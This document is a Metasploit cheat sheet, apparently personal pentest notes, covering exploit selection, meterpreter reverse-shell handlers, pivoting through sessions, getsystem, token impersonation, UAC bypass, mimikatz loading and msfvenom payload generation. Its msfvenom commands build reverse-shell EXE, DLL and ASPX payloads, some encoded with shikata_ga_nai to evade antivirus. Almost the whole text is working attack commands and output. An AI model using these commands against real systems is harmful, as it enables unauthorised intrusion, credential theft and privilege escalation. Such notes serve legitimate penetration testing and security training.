Reconnaissance
Search for an exploit
search < version / service name / port >
Structure
auxiliary/ # Modules such as scanners, crawlers and fuzzers can be found here.
encoders/ # Encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.
evasion/ # Encode the payload to "try" to evade antivirus software.
exploit/ # Exploits, neatly organized by target system.
payloads/ # Code that will run on the target system.
├── adapters/ # An adapter wraps single payloads to convert them into different formats.
├── singles/ # Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
├── stagers/ # Responsible for setting up a connection channel between Metasploit and the target system. Useful when working with staged payloads.
└── stages/ # Downloaded by the stager.
post/ # Post-exploitation modules.
Weaponization
Select an exploit
use <exploit-path>
Deselect the current module
back
Show options
show options
Show compatible payloads
show payloads
Set an option
set <option-name> <value>
Exploitation
Launch the exploit
exploit
Run post-exploitation modules
0xlun@Lunatik $ [CTRL+Z]
msf5 > sessions -l
msf5 > use post/<path>
msf5 > set SESSION <session-id>
msf5 > run
Sessions
Background the session (terminal)
[CTRL+Z]
List sessions
sessions
Select a session
sessions -i <session-id>
Add a route (use a meterpreter session as a proxy):
route add <CIDR> <session-id>
route print
The session must be able to reach the specified network. Routes can be collected automatically with autoroute:
use multi/manage/autoroute
show options
sessions -l
set session <session-id>
run
These routes can then be reached through a SOCKS proxy:
use auxiliary/server/socks_proxy
show options
set SRVHOST 127.0.0.1
set VERSION 5
run -j
Shell To Meterpreter
Via shell_to_meterpreter:
msf5 > use post/multi/manage/shell_to_meterpreter
msf5 > set SESSION <session-id>
msf5 > run
Via session:
sessions -u <session-id>
sessions -u -1 # For the last active session
Meterpreter
Starting the handler in msfconsole
lun$ msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > show payloads
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.99
msf5 exploit(multi/handler) > set LPORT 443
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.99:443
Host activity status (idle time):
idletime
System information:
sysinfo
Téléchargement [ victim >> attacker ]
download <source> <destination>
Upload [ attacker >> victim ]
upload <source> <destination>
Run a command:
execute -f <command> -i -H
Get a standard shell:
shell
Get a standard PowerShell shell:
load powershell
powershell_shell
Become SYSTEM:
getuid
getsystem
getuid
Migration:
migrate <pid>
Commands on the local (attacker) machine:
lpwd # local equivalent of pwd
lcd # local equivalent of cd
lls # local equivalent of ls
lcat # local equivalent of cat
Get the integrity level of our process:
shell
powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
Incognito
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > help
Incognito Commands
==================
Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
SNEAKS.IN\Administrator
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > impersonate_token SNEAKS.IN\\Administrator
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\Administrator
meterpreter > getuid
Server username: SNEAKS.IN\Administrator
Post exploitation modules
msf6 > use <exploit>
msf6 exploit(<exploit>) > set SESSION <session-id>
msf6 exploit(<exploit>) > set LPORT <port>
msf6 exploit(<exploit>) > set LHOST <host>
msf6 exploit(<exploit>) > run
exploit/windows/local/bypassuac_sdclt #bypass UAC
exploit/windows/smb/psexec #psexec
post/multi/recon/local_exploit_suggester # exploit suggester
Load the mimikatz module in the shell:
meterpreter > load kiwi # mimikatz module
meterpreter > help
Msfvenom
List:
msfvenom -l payloads # Payloads
msfvenom -l encoders # Encoders
Common payloads:
windows/shell_reverse_tcp # x86 simple reverse shell
windows/x64/shell_reverse_tcp # x64 simple reverse shell
windows/meterpreter/reverse_tcp # x86 meterpreter reverse shell
windows/x64/meterpreter/reverse_tcp # x64 meterpreter reverse shell
linux/x86/shell_reverse_tcp # x86 simple reverse shell
linux/x64/shell_reverse_tcp # x64 simple reverse shell
linux/x86/meterpreter/reverse_tcp # x86 meterpreter reverse shell
linux/x64/meterpreter/reverse_tcp # x64 meterpreter reverse shell
Others: msfvenom -l payloads
List the payload's options:
msfvenom -p <payload/path> --list-options
Generate an EXE:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o reverse.exe
msfvenom -p windows/meterpreter/bind_tcp LPORT=<PORT> -f exe -o bind.exe
Generate a DLL:
msfvenom -p <payload/path> <option>=<value> -f dll -o <dllname>.dll
Generate an asp/aspx:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > reverse.asp
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx > reverse.aspx
Obfuscation:
msfvenom -p windows/meterpreter/reverse_tcp --encoder x86/shikata_ga_nai LHOST=<IP> LPORT=<PORT> -f exe -o reverse.exe
Formats (-f):
# Executable formats
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
# Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscr